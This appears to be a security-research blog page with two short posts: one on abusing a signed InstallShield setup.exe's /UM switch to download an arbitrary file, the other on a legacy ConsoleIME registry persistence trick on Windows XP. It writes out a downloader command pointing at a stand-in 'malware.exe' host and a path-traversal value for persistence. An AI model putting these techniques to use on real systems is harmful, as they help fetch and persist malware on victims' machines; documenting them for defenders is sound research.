Using signed Installshield installers as downloaders

Posted on by

Most of modern InstallShield setup programs are wrappers for MSI. The task of launching the installation wizard is delegated to a setup.exe program that is present as a stub of the file.

The stub accepts command line arguments shown below:

  • /L language ID
  • /S Hide intialization dialog.
  • /V parameters to MsiExec.exe
  • /UA[url to InstMsiA.exe]
  • /UW[url to InstMsiW.exe]
  • /UM[url to msi package]
  • /US[url to IsScript.msi]

Not all setup.exe I tested accept all these arguments, or perhaps I didn’t know how to properly use them. It’s actually a bit of a mess — this file [PDF warning] lists many InstallShield command line arguments, and while it covers many versions of the program, many of these switches require a lot of trial and error + most won’t work. You can either try your luck, or better yet, reverse particular version of Installshield stub. In any case… sometimes we may get lucky – as I was with /UM[URL] command line argument that I successfully tested on an older Installshield installer for ACDSEE software (from 2010).

Running the following command will make the setup program download a file of your choice and place it into a %TEMP%\_is-<random> folder on your system:

setup.exe /umhxxp://www.[somedomain].com/malware.exe /s

The command uses “/S” to hide most of the GUI. Most, because once your file is downloaded, and setup recognizes that it’s not a valid MSI, you will see this dialog box:

Its presence has its pros and cons. It’s good, because it pauses the setup program for a moment. Bad, because there is a GUI visible. When this dialog pops up, your .exe is already in the %TEMP%\_is-<random> directory and you can fetch it. Once you click OK, all files in that temporary folder will be deleted.

Not the most elegant solution for downloading files, but well… it’s just yet another option.

Beyond good ol’ Run key, Part 106

Posted on by

This persistence trick has a historical value only (at least as far as I can tell). It only works on old Windows XP, and only on systems with IME e.g. Chinese.

On these systems when console window is created, the kernel32.dll reaches out to the following Registry entry:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console\ConsoleIME

It then fetches the string that is stored there. If the entry is not present, the default ‘conime.exe’ string is assumed.

The conime.exe, or its replacement is then launched.

In the demo below, I run a test on Chinese Windows XP, where I set the value to calc.exe. You can’t specify a full path – the system will prepend the value with a path referring to its system directory (e.g. c:\windows\system32\). Of course, we can always use parent directory trick to run any file from any location on a system (e.g. ..\..\test\malware.exe will run c:\test\malware.exe)